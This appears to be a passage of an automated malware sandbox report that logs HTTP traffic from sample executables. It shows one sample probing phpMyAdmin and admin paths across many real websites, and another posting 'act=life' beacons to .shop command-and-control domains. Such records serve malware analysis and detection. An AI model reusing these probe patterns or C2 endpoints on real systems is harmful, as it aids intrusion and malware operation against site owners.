                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 898Y{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IR
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810950041 CET338INData Raw: 9d fd dd cc e0 91 81 0b 23 47 06 20 c5 3f e5 d4 27 27 d1 a0 53 0f 82 9e cf 87 a7 8e 0c ec 49 e1 1a fb 01 24 c7 95 eb cb 7b ed c7 86 98 a3 0b a2 ca 42 8a 29 83 13 95 98 e1 70 1a 36 f6 21 70 7f 53 27 0a c4 36 66 04 b5 80 13 0f 72 7a 91 30 ac ac 7a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: #G ?''SI${B)p6!pS'6frz0zNSTm@Fux8,!&GP`\:0sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810959101 CET7INData Raw: 32 0d 0a 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.810970068 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.814790964 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:14.019889116 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821692746961147
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=342CDDB632C0EDB874E5202F1BA7A945:FG=1; expires=Tue, 04-Feb-25 11:16:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821692746961147
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0sMajEFUmr/tG5Nv+UfTwfrrwBFwSCCnP+wTlk3OCccCoaD3A==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 898Y{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IR
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:14.161017895 CET350INData Raw: 9d fd dd cc e0 91 81 0b 23 47 06 20 c5 3f e5 d4 27 27 d1 a0 53 0f 82 9e cf 87 a7 8e 0c ec 49 e1 1a fb 01 24 c7 95 eb cb 7b ed c7 86 98 a3 0b a2 ca 42 8a 29 83 13 95 98 e1 70 1a 36 f6 21 70 7f 53 27 0a c4 36 66 04 b5 80 13 0f 72 7a 91 30 ac ac 7a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: #G ?''SI${B)p6!pS'6frz0zNSTm@Fux8,!&GP`\:0sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                578192.168.2.650357186.113.7.20480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.472697020 CET181OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: oferta.senasofiaplus.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.658293009 CET144INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://oferta.senasofiaplus.edu.co/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                579192.168.2.65034231.216.144.580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.483145952 CET162OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.682991028 CET195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                580192.168.2.65041431.13.88.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.510015965 CET179OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.612258911 CET213INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                581192.168.2.65044044.199.96.17980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.531352043 CET175OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.647356033 CET394INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                582192.168.2.65046334.149.46.13080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.574131012 CET177OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.676585913 CET206INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                583192.168.2.65037876.223.26.9680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.574773073 CET196OUTGET /admin?usid=27&utid=4923818255 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww12.chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                584192.168.2.65044964.190.63.13680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.640456915 CET222OUTGET /admin/?sub1=20240205-2216-13fb-b4a4-baa2c3c98c38 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.849565983 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                585192.168.2.650370164.100.213.21080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.726046085 CET171OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:21.517009020 CET139INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://ssc.nic.in/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Server: web_server
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                586192.168.2.650527142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.740485907 CET173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.868469954 CET478INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.868567944 CET178INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 e2 62 0a c6 48 8c 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 b5 68 1b 96 d0 9a e7 65 18 e2 26 1a ce 5a fb 82 01 09 30 8b 75 d2 3d a7 37 25 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHkA$bH}cc0he&Z0u=7%CB/XtKt}UFEXQx=kn"4+21GsT~YH65'H5d1`%9K;


                                                                                                                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                0192.168.2.649707172.67.217.1004437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:24 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: resergvearyinitiani.shop
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:25 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:25 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=581qhk2t2oajiemesh6pv0eev2; expires=Fri, 31-May-2024 04:59:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xqpdu05F%2BE44Cb%2FUPls612EYX1otO9ZCvhFxct9UuoKc8vHM2YqsWLTpY9d5LuBgAXSfEw5xV0A0HQpyq%2FR2x0P9L7xqgB5rlTH8rTGfG9FnEf77XhIdR8P93two2%2Ba42htAnFOVg7kqLvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7dc885a673b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                1192.168.2.649708172.67.152.524437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:27 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: gemcreedarticulateod.shop
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:28 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=af96kv0ofl8hpn9l2al04brhk9; expires=Fri, 31-May-2024 04:59:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
